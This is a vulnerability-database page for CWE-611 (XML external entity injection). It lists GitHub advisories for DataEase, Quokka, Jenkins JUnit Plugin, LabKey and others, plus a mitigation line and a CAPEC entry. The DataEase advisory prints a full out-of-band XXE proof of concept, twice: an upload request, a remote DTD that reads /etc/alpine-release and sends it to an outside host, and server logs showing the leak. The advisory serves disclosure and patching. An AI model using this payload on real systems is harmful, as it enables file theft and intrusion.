CWE-611
AllowedImproper Restriction of XML External Entity Reference
Abstraction: Base · Status: Draft
The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
1694 vulnerabilities reference this CWE, most recent first.
GHSA-4M9P-7XG6-F4MM
Vulnerability from github – Published: 2024-09-23 20:27 – Updated: 2024-09-23 20:27Impact
There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.
- send request:
POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn
------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a
<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>
%EvilDTD;
%LoadOOBEnt;
%OOB;
]>
------WebKitFormBoundary6OZBNygiUCAZEbMn--
// 1.dtd的内容
<!ENTITY % resource SYSTEM "file:///etc/alpine-release">
<!ENTITY % LoadOOBEnt "<!ENTITY % OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">
- After sending the request, the content of the file /etc/alpine-release is successfully read
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
Affected versions: <= 2.10.0
Patches
The vulnerability has been fixed in v2.10.1.
Workarounds
It is recommended to upgrade the version to v2.10.1.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease Email us at wei@fit2cloud.com
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.10.0"
},
"package": {
"ecosystem": "Maven",
"name": "io.dataease:common"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-46985"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2024-09-23T20:27:22Z",
"nvd_published_at": "2024-09-23T16:15:06Z",
"severity": "HIGH"
},
"details": "### Impact\nThere is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.\n\n1. send request:\n```\nPOST /de2api/staticResource/upload/1 HTTP/1.1\nHost: dataease.ubuntu20.vm\nContent-Length: 348\nAccept: application/json, text/plain, */*\nout_auth_platform: default\nX-DE-TOKEN: jwt\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn\n\n------WebKitFormBoundary6OZBNygiUCAZEbMn\nContent-Disposition: form-data; name=\"file\"; filename=\"1.svg\"\nContent-Type: a\n\n\u003c?xml version=\u00271.0\u0027?\u003e\n \u003c!DOCTYPE xxe [\n \u003c!ENTITY % EvilDTD SYSTEM \u0027http://10.168.174.1:8000/1.dtd\u0027\u003e\n %EvilDTD;\n %LoadOOBEnt;\n %OOB;\n ]\u003e\n------WebKitFormBoundary6OZBNygiUCAZEbMn--\n\n// 1.dtd\u7684\u5185\u5bb9\n\u003c!ENTITY % resource SYSTEM \"file:///etc/alpine-release\"\u003e\n \u003c!ENTITY % LoadOOBEnt \"\u003c!ENTITY \u0026#x25; OOB SYSTEM \u0027http://10.168.174.1:8000/?content=%resource;\u0027\u003e\"\u003e\n```\n\n2. After sending the request, the content of the file /etc/alpine-release is successfully read\n```\n::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] \"GET /1.dtd HTTP/1.1\" 200 -\n::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] \"GET /?content=3.20.0 HTTP/1.1\" 200 -\n```\n\nAffected versions: \u003c= 2.10.0\n\n### Patches\nThe vulnerability has been fixed in v2.10.1.\n\n### Workarounds\nIt is recommended to upgrade the version to v2.10.1.\n\n### References\nIf you have any questions or comments about this advisory:\n\nOpen an issue in https://github.com/dataease/dataease\nEmail us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)\n",
"id": "GHSA-4m9p-7xg6-f4mm",
"modified": "2024-09-23T20:27:22Z",
"published": "2024-09-23T20:27:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dataease/dataease/security/advisories/GHSA-4m9p-7xg6-f4mm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46985"
},
{
"type": "PACKAGE",
"url": "https://github.com/dataease/dataease"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "DataEase has an XML External Entity Reference vulnerability"
}
GHSA-4Q2R-QXP6-H5J6
Vulnerability from github – Published: 2021-08-30 16:25 – Updated: 2024-10-16 21:33XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component 'quokka/core/content/views.py'.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "quokka"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-18705"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-26T16:34:46Z",
"nvd_published_at": "2021-08-16T18:15:00Z",
"severity": "CRITICAL"
},
"details": "XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component \u0027quokka/core/content/views.py\u0027.",
"id": "GHSA-4q2r-qxp6-h5j6",
"modified": "2024-10-16T21:33:50Z",
"published": "2021-08-30T16:25:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-18705"
},
{
"type": "WEB",
"url": "https://github.com/rochacbruno/quokka/issues/676"
},
{
"type": "WEB",
"url": "https://github.com/quokkaproject/quokka/pull/679"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/quokka/PYSEC-2021-145.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/rochacbruno/quokka"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Improper Restriction of XML External Entity Reference in Quokka"
}
GHSA-4QR6-CJV5-78XJ
Vulnerability from github – Published: 2026-01-17 09:31 – Updated: 2026-01-17 09:31The Demo Importer Plus plugin for WordPress is vulnerable to XML External Entity Injection (XXE) in all versions up to, and including, 2.0.9 via the SVG file upload functionality. This makes it possible for authenticated attackers, with Author-level access and above, to achieve code execution in vulnerable configurations. This only impacts sites on versions of PHP older than 8.0.
{
"affected": [],
"aliases": [
"CVE-2025-14478"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-17T08:15:51Z",
"severity": "HIGH"
},
"details": "The Demo Importer Plus plugin for WordPress is vulnerable to XML External Entity Injection (XXE) in all versions up to, and including, 2.0.9 via the SVG file upload functionality. This makes it possible for authenticated attackers, with Author-level access and above, to achieve code execution in vulnerable configurations. This only impacts sites on versions of PHP older than 8.0.",
"id": "GHSA-4qr6-cjv5-78xj",
"modified": "2026-01-17T09:31:14Z",
"published": "2026-01-17T09:31:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14478"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/demo-importer-plus/tags/2.0.6/inc/importers/class-demo-importer-plus-sites-helper.php#L88"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php#L88"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3439643/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2971aa0-8287-4142-bd04-7aec1ed92e7b?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-4QV7-MVG8-3455
Vulnerability from github – Published: 2022-06-03 00:00 – Updated: 2022-06-14 00:00NetScout nGeniusONE 6.3.2 allows an XML External Entity (XXE) attack.
{
"affected": [],
"aliases": [
"CVE-2021-45981"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-02T18:15:00Z",
"severity": "CRITICAL"
},
"details": "NetScout nGeniusONE 6.3.2 allows an XML External Entity (XXE) attack.",
"id": "GHSA-4qv7-mvg8-3455",
"modified": "2022-06-14T00:00:37Z",
"published": "2022-06-03T00:00:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45981"
},
{
"type": "WEB",
"url": "https://netscout.com"
},
{
"type": "WEB",
"url": "https://www.netscout.com/securityadvisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4R2R-HJRW-MPQ6
Vulnerability from github – Published: 2024-11-08 12:31 – Updated: 2024-11-13 21:30Zohocorp ManageEngine SharePoint Manager Plus versions 4503 and prior are vulnerable to authenticated XML External Entity (XXE) in the Management option.
{
"affected": [],
"aliases": [
"CVE-2024-10839"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-08T11:15:03Z",
"severity": "HIGH"
},
"details": "Zohocorp ManageEngine SharePoint Manager Plus versions\u00a04503 and prior are vulnerable to authenticated XML External Entity (XXE) in the Management option.",
"id": "GHSA-4r2r-hjrw-mpq6",
"modified": "2024-11-13T21:30:31Z",
"published": "2024-11-08T12:31:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10839"
},
{
"type": "WEB",
"url": "https://www.manageengine.com/sharepoint-management-reporting/advisory/CVE-2024-10839.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-4R4V-5CJX-R22J
Vulnerability from github – Published: 2022-05-14 01:21 – Updated: 2022-05-14 01:21SAP HANA extended application services, version 1, advanced does not sufficiently validate an XML document accepted from an authenticated developer with privileges to the SAP space (XML External Entity vulnerability).
{
"affected": [],
"aliases": [
"CVE-2019-0277"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-03-12T22:29:00Z",
"severity": "MODERATE"
},
"details": "SAP HANA extended application services, version 1, advanced does not sufficiently validate an XML document accepted from an authenticated developer with privileges to the SAP space (XML External Entity vulnerability).",
"id": "GHSA-4r4v-5cjx-r22j",
"modified": "2022-05-14T01:21:15Z",
"published": "2022-05-14T01:21:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0277"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/2764283"
},
{
"type": "WEB",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=515408080"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/107356"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4RF8-J9GH-8QPH
Vulnerability from github – Published: 2022-05-24 17:00 – Updated: 2024-04-04 02:36An issue was discovered in LabKey Server 19.1.0. Sending an SVG containing an XXE payload to the endpoint visualization-exportImage.view or visualization-exportPDF.view allows local files to be read.
{
"affected": [],
"aliases": [
"CVE-2019-9757"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-29T19:15:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in LabKey Server 19.1.0. Sending an SVG containing an XXE payload to the endpoint visualization-exportImage.view or visualization-exportPDF.view allows local files to be read.",
"id": "GHSA-4rf8-j9gh-8qph",
"modified": "2024-04-04T02:36:23Z",
"published": "2022-05-24T17:00:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9757"
},
{
"type": "WEB",
"url": "https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-9757"
},
{
"type": "WEB",
"url": "https://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-4RJ6-9PJH-882R
Vulnerability from github – Published: 2022-05-14 03:40 – Updated: 2022-06-30 19:45Jenkins JUnit Plugin 1.23 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.23"
},
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:junit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.24"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-1000056"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-30T19:45:12Z",
"nvd_published_at": "2018-02-09T23:29:00Z",
"severity": "HIGH"
},
"details": "Jenkins JUnit Plugin 1.23 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.",
"id": "GHSA-4rj6-9pjh-882r",
"modified": "2022-06-30T19:45:12Z",
"published": "2022-05-14T03:40:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000056"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/junit-plugin/commit/15f39fc49d9f25bca872badb48e708a8bb815ea7"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/junit-plugin"
},
{
"type": "WEB",
"url": "https://jenkins.io/security/advisory/2018-02-05"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "Improper Restriction of XML External Entity Reference in Jenkins JUnit Plugin"
}
GHSA-4RJJ-V6CR-F48F
Vulnerability from github – Published: 2023-03-22 00:30 – Updated: 2023-03-24 06:30Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.
{
"affected": [],
"aliases": [
"CVE-2022-46286"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-21T23:15:00Z",
"severity": "MODERATE"
},
"details": "Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.",
"id": "GHSA-4rjj-v6cr-f48f",
"modified": "2023-03-24T06:30:16Z",
"published": "2023-03-22T00:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46286"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-080-05"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-4V52-8764-FM33
Vulnerability from github – Published: 2022-05-14 01:42 – Updated: 2022-05-14 01:42autopsy version <= 4.9.0 contains a XML External Entity (XXE) vulnerability in CaseMetadata XML Parser that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This attack appear to be exploitable via Specially crafted CaseMetadata.
{
"affected": [],
"aliases": [
"CVE-2018-1000838"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-12-20T15:29:00Z",
"severity": "CRITICAL"
},
"details": "autopsy version \u003c= 4.9.0 contains a XML External Entity (XXE) vulnerability in CaseMetadata XML Parser that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This attack appear to be exploitable via Specially crafted CaseMetadata.",
"id": "GHSA-4v52-8764-fm33",
"modified": "2022-05-14T01:42:27Z",
"published": "2022-05-14T01:42:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000838"
},
{
"type": "WEB",
"url": "https://github.com/sleuthkit/autopsy/issues/4236"
},
{
"type": "WEB",
"url": "https://0dd.zone/2018/10/28/autopsy-XXE"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Many XML parsers and validators can be configured to disable external entity expansion.
CAPEC-221: Data Serialization External Entities Blowup
This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.